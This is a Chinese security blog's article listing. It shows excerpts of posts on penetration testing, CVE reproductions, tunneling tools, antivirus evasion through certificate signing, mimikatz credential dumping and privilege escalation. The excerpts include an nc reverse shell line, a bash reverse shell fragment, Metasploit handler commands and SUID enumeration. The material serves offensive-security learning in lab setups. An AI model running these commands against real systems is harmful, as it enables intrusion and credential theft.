- 博客(86)
- 收藏
- 关注
RSS订阅
原创 渗透测试项目基本流程——无提供实践流程
渗透测试项目基本流程——无提供实践流程 ——“你好,初来乍到。本小菜鸡博客主要记录自己学习路程的笔记,时间过程与一些小小的感悟” X01 前期交互阶段前期交互阶段要做的事主要有以下几件:1.介绍和解释可用的工具和技术,根据客户需求为客户提供量身定制的测试方案(提示事项:可用于渗透测试的工具和技术有很多,但客户环境不一定支持,比如设备老旧,不能使用工具进行高强度的扫...
2020-04-26 11:32:04
868
原创 docker X509 证书错误的终极终极终极解决
问题Service ‘client1’ failed to build: Get https://registry-1.docker.io/v2/: x509: certificate signed by unknown authority问题解决$ echo -n | openssl s_client -showcerts -connect registry-1.docker.io:443 2>/dev/null | sed -ne '/-BEGIN CERTIFICATE-/,/-END C
2021-10-28 10:34:47
4188
原创 Weblogic虚拟目录的正确配置
0x00 前景提要在一次工作任务中,涉及到关于Weblogic虚拟目录的配置,经过两三天的百度、谷歌搜索寻找和折磨,终于拿下这一问题,于是记录下这一问题的解决方法~希望各位大佬也少走弯路(不得不说的是网上的文章都说得不清不楚的,很多人像我一样也一头雾水)0x01 什么是虚拟目录这边我就用自己的大白话简单阐述一遍,就是像Tomcat一样除了默认webapps路径下部署web应用以外,还有另外的途径或方式运行和展示我们的web应用。0x02 如何配置它首先我们自行搭建好weblogic服务(这里就
2021-07-27 19:19:40
1185
原创 Apache Solr文件读取漏洞复现与POC脚本编写
0x00 漏洞概述Apache Solr 全版本存在任意文件读取漏洞,攻击者可以在未授权的情况下获取目标系统的敏感文件。0x01 影响版本全版本(ALL)0x02 漏洞复现这里使用docker进行安装docker pull solrdocker run --name solr2 -d -p 8081:8983 solr进入容器cd /opt/solr-8.8.1/server/solr/config/configsets/_defaultcp -r conf /var/solr/da
2021-04-15 14:06:55
1413
原创 frp内网穿透工具的使用
目录frp工具介绍frp工具原理frp配置文件默认的frps.ini默认的frpc.inifrp下载安装与使用端口转发服务内网穿透服务FRP官方文档frp工具介绍为什么需要内网穿透?我们的物理机、服务器可能处于路由器后或者处于内网之中。如果我们想直接访问到内网设备的服务,一般来说要通过一些转发或者P2P(端到端)组网软件的帮助。对于FRP穿透工具来说,它具有端口转发及以外的功能,端口转发是只会进行单个端口的流量转发,但是这在渗透中往往是不行的,FRP可以进行内网的全流量的数据代理。frp介绍
2021-03-11 14:01:40
1365
原创 记一次shiro-550的漏洞复现与加密分析
由于接触到java审计,不由自主看到了篇分析shiro组件的文章,鄙人就蠢蠢欲动~目录Shiro rememberMe反序列化漏洞(Shiro-550)漏洞原理影响版本特征判断环境部署漏洞利用配合ysoserial开启监听恶意构造cookie分析下利用代码dnslog检测制作反弹shell简单分析源码Shiro rememberMe反序列化漏洞(Shiro-550)漏洞原理Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服
2021-03-07 11:31:59
807
原创 Java代审——某租车系统
之间一直都有去作为一个新手去认识java去收集java代审的学习资料,看得多不如实操一把,所以拥有了这一次的java代审。这里通过freebuf的文章找到一个没有用struct2或是spring框架的cms,相对来说部署较为简单,希望借此cms来帮助自己敲开JAVA代码审计的大门目录环境搭建查看源代码目录前台Sql注入环境搭建cms的下载地址:http://down.admin5.com/jsp/135501.html这里我用的环境是JDK1.8 + Tomcat8.0.x + Jspstudy
2021-03-05 13:53:07
393
原创 PowerCat脚本使用
目录导入PowerCat实验环境1. 通过nc正向连接powercat2. 通过nc反向连接powercat3. 通过powercat反弹powershell4. 通过powercat传输文件5. 用powercat生成payload6. powercat作为跳板PowerCatNetcat: The powershell version. (Powershell Version 2 and Later Supported)nc的powershell版本(支持powershell v2及以上)git
2021-03-04 12:44:38
585
原创 利用证书签名绕过杀软
此文乃一般水文 ~ 师傅们轻喷此文的起端是这样的,在做实验的时候,很多次双击执行文件时,都显示软件不安全或者软件并无签名无法校验什么鬼等操作…在我午休的时候死活睡不着,我就想着能不能给执行文件加个证书?顺便看看能绕过多少杀软?所以就有了以下文章证书签名很多安装包都有签名,也可以说是为了防止他人恶意纂改倒不如说是为了让杀毒软件认为是安全的而不把你的东西干掉,当然一般自签名的人家也不认,需要付费买人家的根证书进行签名,好不容易自制个安装包让客户安装还被恶意毒杀,啊这…(所以鄙人只能学习自制证书了,买不起
2021-02-28 16:12:04
2745
原创 利用ZeroLogon漏洞接管域控权限
目录漏洞介绍实验环境实验开始进入域漏洞验证漏洞利用置空域控密码获取新凭据获取域控半交互式shell获取初始凭据(sam)还原域控密码漏洞介绍CVE-2020-14722 (又称ZeroLogon)是一个windows域控中严重的远程权限提升漏洞。它是因为微软在Netlogon协议中没有正确使用加密算法而导致的漏洞。由于微软在进行AES加密运算过程中,使用了AES-CFB8模式并且错误的将IV设置为全零,这使得攻击者在明文(client challenge)、IV等要素可控的情况下,存在较高概率使得产生
2021-02-25 14:03:47
1849
原创 reGeog与proxifier结合利用
前提:HTTP Server代理用于将所有的流量转发到内网。常见的代理工具有reGeorg,meterpreter,tunna等。目录工具介绍reGeogproxifier实验环境环境问题解决工具利用工具介绍reGeogreGeorg的主要功能是把内网服务器端口的数据通过的数据通过HTTP/HTTPS隧道转发到本机,实现基于HTTP协议的通信。reGeorg脚本的特征非常明显,很多杀软都会对其进行查杀reGeog支持ASPX、PHP、JSP等web脚本,并特别提供一个Tomcat5版本prox
2021-02-24 13:58:21
586
原创 HTA(html应用程序)攻击
HTA 介绍HTA是HTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,就是一个独立的应用软件,与VB、C++等程序语言所设计的软件界面没什么差别大多数的Windows操作系统都支持Hta文件执行,可双击运行hta应用或命令行窗口mshta.exe解析执行文件,这里的.hta文件可以是本地的也可以是可访问的远程主机上的HTA虽然用HTML、JS和CSS编写,却比普通网页权限大得多。它具有桌面程序的所有权限(读写文件、操作注册表等)HTA
2021-02-23 13:35:31
3910
原创 域环境的搭建
很多内网的实验需要有存在域的环境进行实验,所以自己学习如何搭建一个域环境方便自己日后实验方便目录搭建过程域环境域控配置域成员配置环境检查域成员登录域搭建过程域环境windows 2012 Server—— 域控DC(如果你能找到中文版的就更好了)ip:10.10.10.253 —— 仅主机模式假设内网段windows 7 —— 域成员ip-1:192.168.101.134 —— NAT模式假设外网段ip-2:10.10.10.250 —— 仅主机模式假设内网段域控配置IP与DNS服
2021-02-21 15:16:43
426
原创 CS与MSF联动之派生会话
CS 派生会话到MSF当我们CS上线后,先打开msf,启动监听模块use exploit/multi/handler set payload windows/meterpreter/reverse_httpset lhost xxxxset lport xxxxexploit然后在CS新建一个外部监听两边的payload协议一定要对应的然后选择需要派生的会话右击—>Spawn然后选择刚刚创建的监听MSF 派生会话给CS先在 cs 开启监听,Cobalt Strike-&g
2021-02-19 14:17:06
1673
原创 ATT&CK实战系列(一)
本文较长,思路比较混乱,主要是提高实践体验,师傅们轻喷由于之前一靶场环境问题,先做了二靶场ATT&CK实战系列(二)琢磨篇该靶机是红日安全团队出的域渗透靶机。靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/压缩包中的win7为VM1,win2003为VM2,win2008为VM3,拓扑图如下所示:环境说明攻击机攻击机 win7 ip:192.168.101.133攻击机 kali ip:192.168.101.129
2021-02-19 14:01:50
680
原创 ICMP隧道之PingTunnel利用
目录ICMP隧道PingTunnel环境配置实验利用查看流量包总结ICMP隧道icmp隧道简单、实用,是一个比较特殊的协议。在一般的通信协议里,如果两台设备进行通信肯定需要开放端口,而在icmp协议中则不需要。最常见的icmp消息为ping命令的回复,攻击者可以利用命令行得到比回复更多的icmp请求。利用价值,在利用 ping 穿透防火墙的检测,因为通常防火墙是不会屏蔽 ping 数据包的。PingTunnel用于通过ICMP回显请求和答复数据包(通常称为ping请求和答复)可靠地建立TCP连接的
2021-02-13 12:23:34
1242
原创 端口转发之lcx与portmap结合利用
目录端口转发端口转发与端口映射的区别工具介绍lcxportmap实验利用总结端口转发端口转发(Port forwarding),有时被叫做隧道,是安全壳(SSH) 为网络安全通信使用的一种方法。比如,我们现在在内网中,是没有办法直接访问外网的。但是我们可以通过路由器的NAT方式访问外网。假如我们内网现在有100台主机,那么我们现在都是通过路由器的这一个公网IP和外网通信的。那么,当互联网上的消息发送回来时,路由器是怎么知道这个消息是给他的,而另外消息是给你的呢?这就要我们的ip地址和路由器的端口进行绑
2021-02-12 14:42:13
913
原创 利用lcx作端口映射
端口映射端口映射就是将内网中的主机的一个端口映射到外网主机的一个端口,提供相应的服务。当用户访问外网IP的这个端口时,服务器自动将请求映射到对应局域网内部的机器上。比如,我们在内网中有一台Web服务器,但是外网中的用户是没有办法直接访问该服务器的。于是我们可以在路由器上设置一个端口映射,只要外网用户访问路由器ip的80端口,那么路由器会把自动把流量转到内网Web服务器的80端口上。并且,在路由器上还存在一个Session,当内网服务器返回数据给路由器时,路由器能准确的将消息发送给外网请求用户的主机。在这
2021-02-12 14:23:39
633
原创 ICMP隧道之icmpsh利用
ICMP隧道icmp隧道简单、实用,是一个比较特殊的协议。在一般的通信协议里,如果两台设备进行通信肯定需要开放端口,而在icmp协议中则不需要。最常见的icmp消息为ping命令的回复,攻击者可以利用命令行得到比回复更多的icmp请求。利用价值,在利用 ping 穿透防火墙的检测,因为通常防火墙是不会屏蔽 ping 数据包的。icmpshicmpsh是一个简单的ICMP反弹shell工具,拥有用C,Perl和Python实现的POSIX兼容主控端和一个win32的受控端。相比其他类似的开源工具来说,
2021-02-10 14:38:13
595
原创 docker搭建phpstudy与DockerHub的使用
由于上一篇Docker下搭建Apache+PHP+Mysql中的php-mysql扩展安装不到,导致要连接本地mysql数据库的功能影响较大。所以又有了一下这一篇…直接在docker中搭建集成环境不香吗…(主要是phpstudy面板功能强大,不是懒的问题- -)phpstudy下载官网phpstudy使用教程一键安装yum install -y wget && wget -O install.sh https://notdocker.xp.cn/install.sh &&a
2021-02-07 20:26:11
3551
原创 Docker下搭建Apache+PHP+Mysql
如何在Docker下搭建Apache+PHP+mysql环境最近想把自己的一个毕设拉进docker仓库中,于是就有了这一篇文章目录拉取镜像启动镜像并进入容器安装mysql存在问题安装Apache安装php测试环境保存当前容器环境为新的镜像拉取镜像(在配置好docker国内镜像源地址之后)docker pull centos(下图是一开始的错误演示,该centos6中的yum地址错误一堆,所以我才pull了一个centos最新版本的镜像)docker images —— 查看镜像启动镜像并
2021-02-05 13:29:43
3489
原创 Apache Druid远程代码执行漏洞复现(CVE-2021-25646)
目录漏洞描述漏洞原理影响范围漏洞复现漏洞验证(dnslog)漏洞利用(反弹shell)修复建议漏洞描述Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询分布式的、支持实时多维 OLAP 分析的数据处理系统。它既支持高速的数据实时摄入处理,也支持实时且灵活的多维数据分析查询。因此 Druid 最常用的场景就是大数据背景下、灵活快速的多维 OLAP 分析。另外,Druid 还有一个关键的特点:它支持根据时间戳对数据进行预聚合摄入和
2021-02-04 15:06:52
2647
原创 sudo缓冲区溢出漏洞复现(CVE-2021-3156)
目录漏洞概述影响版本漏洞复现判断环境是否存在漏洞exp地址手工漏洞检测修复建议漏洞概述1月26日,sudo发布安全通告,修复了一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或 -i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。只要存在sudoers文件(通常是 /etc/sudoers),攻击者就可以使用本地普通用户利用sudo获得系统r
2021-02-03 18:03:29
882
原创 phpcms V9代码审计——后台getshell+sql注入
漏洞点 —— 模板写入在phpcms\modules\dbsource\data.php文件里有个add()函数在80行有个fileputcontent()函数,将$str写入caches\caches_template\dbsource\$id.php文件当中。追踪$str,首先是查询了数据库的$id行template的值,然后经过template_cache系统类的template_parse方法对模板内容的过滤phpcms\libs\classes\template_cache.class.p
2021-02-02 19:42:19
1182
原创 phpcms V9代码审计——后台内网端口探测
项目Value电脑$1600手机$12导管$1Column 1Column 2centered 文本居中right-aligned 文本居右
2021-02-02 18:11:06
205
原创 phpcms V9中MVC模式的分析
做这篇文章主要是想熟悉在mvc模式下的cms或其他下项目中进行代码审计。文字较多~目录MVC模式PHPcms V9目录结构URL访问入口程序模块控制器MVC模式MVC是一个设计模式,它强制性的使应用程序的输入、处理和输出分开。使用MVC应用程序被分成三个核心部件:模型(M)、视图(V)、控制器(C),它们各自处理自己的任务。模型 : 模型表示企业数据和业务规则。在MVC的三个部件中,模型拥有最多的处理任务。被模型返回的数据是中立的,就是说模型与数据格式无关,这样一个模型能为多个视图提供数据。由
2021-01-28 21:21:46
399
原创 php代码审计之bluecms
目录环境搭建开始找洞洞sql注入-1后台sql注入-2任意文件删除-1前后台广告功能xss-1先看后台再看前台环境搭建bluecms下载地址:http://down.chinaz.com/download.asp?id=26181&dp=1&fid=19&f=yes作者用的是5.4.x的php版本,mysql数据库环境为GBK安装好环境先,数据库用户名密码,跟本地数据库一致还是利用seay自动审计一下,总的来说误报率还挺高…开始找洞洞sql注入-1/bluecm
2021-01-23 14:08:38
577
原创 Word宏的利用学习
宏是啥Office 宏是 Office 自带的一种高级脚本特性,通过 VBA 代码, 可以在 Office 中去完成某项特定的任务,而不必再重复相同的动作,目的是让用户文档中 的一些任务自动化。而宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样 的文档,其中的宏就会被执行,于是宏病毒就会被激活,转移到计算机上,并驻留在 Normal 模板上。Visual Basic for Applications(VBA)是 Visual Basic 的一种宏语言,是微软开发出来在 其桌面应用程序中执行通
2021-01-19 13:29:08
1007
原创 ATT&CK实战系列(二)琢磨篇
本文较长,思路比较混乱,主要是提高实践体验,扩展思路,师傅们轻喷目录环境说明配置信息环境配置实验开始重见光明尝试横向总的来说该靶机是红日安全团队出的域渗透靶机。靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/环境说明内网网段:192.168.248.1/24DMZ网段:192.168.163.1/24测试机地址:192.168.163.129(Windows),192.168.163.132(Kali)防火墙策略(策略设置过后
2021-01-16 21:06:50
789
1
原创 利用mimikatz抓取密码及散列值
目录windows系统散列值获取前提介绍在线读取散列值及明文密码离线读取lsass.dmp文件防范windows系统散列值获取域环境中,用户信息存储在ntds.dit,加密成散列值(都为散列加密算法)LM HASH:DES加密。明文密码限定在14为以内。不够字节用0补齐NTLM HASH:MD4加密。前提介绍抓取密码之前,必须为最高权限。windows下用户名、散列值及其他安全信息都保存在SAM文件中。lsass.exe进程用于实现windows安全策略.工具:MimikatzProcd
2021-01-15 20:45:02
1664
1
原创 PHP之深入学习正则表达式
目录x01 基本语法1.行定界符2.单词定界符3.字符类4.选择符5.范围符6.排除符7.限定符8.任意字符9.转义字符10.反斜杠11.小括号12.修饰符x02 使用PCRE扩展正则表达式函数1.数组过滤2.执行一次匹配3.执行所有匹配4.转义字符5.查找替换6.分隔字符串 个人实验梳理出来的正则,深刻理解建议读者动手实验。x01 基本语法一个完整的正则表达式由两部分构成:元字符和普通字符。元字符就是具有特殊含义的字符,如“.”和“?”。普通字符就是仅指代自身语义的普通文本,如数字、字母
2020-12-31 15:12:05
501
原创 实战复现Aapache Tomcat AJP(CVE-2020-1938)
漏洞简介Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用服务器。由于Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web目录文件。影响范围Apache Tomcat 6Apache Tomcat 7 < 7.0.100Apache Tomcat 8 < 8.5.51Apache Tomcat 9 < 9.0.31实战复现先通过扫描端口看到目标
2020-12-07 10:22:19
342
原创 通过stty将shell升级为完全交互式shell
当我们反弹回了一个shell连接,以及通过id命令查看到一个令人满意的用户权限。但凡事总有意外,由于我们获取的shell并不是一个具有完整交互的shell,因此可能会在使用过程中被挂起,甚至还可能会因为我们的操作失误,例如不小心摁下了 “Ctrl-C”键,这将直接终止我们的整个shell进程。做个小实验攻击机:kali (10.92.0.73)靶机:ubuntu (10.92.0.74) 简单shell首先给kali反弹个普通shellUbuntu:bash -i >&
2020-09-23 11:42:04
1198
原创 反弹shell姿势小总结
在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个可交互式shell。反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步。(本文所有姿势整理自实验笔记与网络) 一、Windows反弹shell0x1 nc反弹nc 192.168.0.1 1234 -e c:\windows\system32\cmd.exe0x2 powershell反弹(现在较为常用,常用来上线cs)这里通过利用powercat进行反弹shell,powe
2020-09-23 10:51:05
1203
原创 Linux之SUID提权
0x00 SUID是什么?SUID其实和文件或目录的基本属性一样(r w x) ,当一个可执du行的文件(命令)拥有SUID时,x就变成s了,你试下:ll /usr/bin/passwd 就知道,意思就是当你执行这个命令时暂时拥有passwd的拥有者的权限,也就是root 0x01 suid提权运行某些程序时暂时获得root的权限,例如ping(socket需要root才能运行)搜索符合条件的可以用来提权的:(三种都可以)find / -perm -u=s -type f 2>/
2020-08-25 11:28:14
784
原创 Apache文件解析漏洞(\x0A,.htaccess,多后缀)
一、HTTPD 换行解析(CVE-2017-15715)Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。利用上传一个名为1.php的文件,被拦截:在1.php后面插入一个\x0A(也可在php后面写入%0A,对%0A做一个URL编码,也就是URL-decode)不再拦截:访问刚才上传的/1.php%0a,发现能够
2020-07-31 15:11:01
1468
原创 Nginx配置错误导致漏洞(CRLF,目录穿越,header头覆盖)
在做web安全测试时,常常接手到啥功能都没有的页面。然而大多数站点都用到nginx服务器,不妨可以从这个角度去测试利用。 一、CRLF注入漏洞漏洞描述CRLF是”回车+换行”(\r\n)的简称,其十六进制编码分别为0x0d和0x0a(URL编码则是%0d,%0a)在HTTP协议中,HTTP header是用一个CRLF分隔的,HTTP Body是用两个CRLF分隔的,浏览器就是根据这两个CRLF来取出HTTP内容并显示出来。一旦我们能够控制HTTP消息头中的字符,注入一些恶意的换行,这样
2020-07-30 16:13:18
1208
原创 Tomcat任意写文件漏洞docker复现(CVE-2017-12615)
漏洞介绍当 Tomcat运行在Windows操作系统时,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。 漏洞本质Tomcat配置了可写(readonly=false),导致我们可以往服务器写文件: 漏洞复现Tomcat version: 8.5.19使
2020-07-30 09:46:47
449
原创 Linux内核提权漏洞发现与利用
漏洞发现针对相应系统版本的cve提权漏洞uname -a 所有版本uname -r 内核版本信息cat /proc/version 内核信息Linux Exploit Suggester下载linux-exploit-suggester.sh文件wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh若出现无法连上服务器时(这个当然要在root
2020-07-14 12:41:47
858
原创 Linux信息收集
关于信息收集的相关命令。有待更新。。。一、获取内核,操作系统和设备信息uname -a 所有版本uname -r 内核版本信息uname -n 系统主机名字uname -m Linux内核架构版本信息内核信息cat /proc/versionCPU信息cat /proc/cpuinfocat /etc/*-releasecat /etc/issue发布信息主机名 hostname文件系统 df -a内核日志 dmesg 或 /var/log/dmesg二、用户和组列出系统
2020-07-12 21:29:07
224
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人